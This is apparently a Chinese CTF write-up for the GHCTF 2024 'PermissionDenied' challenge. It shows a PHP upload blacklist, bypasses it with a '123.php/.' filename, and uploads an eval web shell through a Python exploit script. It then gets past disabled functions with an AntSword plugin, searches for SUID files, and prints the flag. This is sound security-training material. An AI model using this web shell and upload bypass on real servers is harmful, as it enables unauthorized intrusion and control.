[GHCTF 2024 新生赛]PermissionDenied

题目源代码

<?php
 
function blacklist($file){
    $deny_ext = array("php","php5","php4","php3","php2","php1","html","htm","phtml","pht","pHp","pHp5","pHp4","pHp3","pHp2","pHp1","Html","Htm","pHtml","jsp","jspa","jspx","jsw","jsv","jspf","jtml","jSp","jSpx","jSpa","jSw","jSv","jSpf","jHtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","aSp","aSpx","aSa","aSax","aScx","aShx","aSmx","cEr","sWf","swf","ini");
    $ext = pathinfo($file, PATHINFO_EXTENSION);
    foreach ($deny_ext as $value) {
        if (stristr($ext, $value)){
            return false;
        }
    }
    return true;
}
​
if(isset($_FILES['file'])){
    $filename = urldecode($_FILES['file']['name']);
    $filecontent = file_get_contents($_FILES['file']['tmp_name']);
    if(blacklist($filename)){
        file_put_contents($filename, $filecontent);
        echo "Success!!!";
    } else {
        echo "Hacker!!!";
    }
} else{
    highlight_file(__FILE__);
}

file_put_content函数有一个文件解析的漏洞

当上传123.php/.的时候,file_put_contents函数会认为是要在123.php文件所在的目录下创建一个名为.的文件,最终上传创建的是123.php

新建1.php,内容如下,和exp放同一个目录下

<?php eval($_POST[0]);phpinfo();?>

#这里的0是蚁剑的连接密码

image-20250513110711446

exp上马

import requests
​
url = "http://node6.anna.nssctf.cn:23009/"  # 目标URL(这里填你题目的URL)
file = {
    "file": ("123.php%2f.", open('1.php', 'rb'))  # 文件名和打开的文件
}
try:
    res = requests.post(url=url, files=file)  # 发送POST请求
    print(res.text)  # 打印服务器响应
except Exception as e:
    print("发生错误:", e)

image-20250513103545510

访问123.php成功

http://node6.anna.nssctf.cn:23009/123.php

#靶场URL/123.php

image-20250512213019777

蚁剑连接

image-20250513103933481

蚁剑连接进去以后

image-20250513104758046

我们看到flag大小45b,是有内容的,但是无法查看,权限是0740

权限 0740 表示文件所有者可以读、写和执行该文件,所属组用户只能读取该文件,而其他用户没有任何权限。

想改一下权限 发现失败了

终端试一下呢

可以发现无法执行命令

image-20250513104024631

查看phpinfo信息,发现命令执行函数被禁用了

image-20250513104128876

这里利用蚁剑的插件【绕过Disable Functions】来绕过,如果没有该插件的话记得蚁剑挂上代理到蚁剑插件市场下载该插件

image-20250513104253142

image-20250513104353579

现在就可以执行命令了

image-20250513104447861

本来想着suid提权,直接给flag路径访问即可

find / -perm -u=s -type f 2>/dev/null
​
/usr/local/s3cRetTt

image-20250513105500863

flag:

NSSCTF{6daca001-e299-41b9-b407-1c6034ead189}

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值